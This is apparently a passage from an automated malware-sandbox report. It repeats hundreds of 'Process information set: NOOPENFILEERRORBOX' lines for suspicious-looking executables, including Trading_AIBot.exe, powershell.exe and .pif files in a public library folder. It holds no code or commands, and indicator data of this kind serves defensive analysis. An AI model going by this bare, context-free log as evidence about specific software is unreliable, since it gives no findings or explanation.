                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
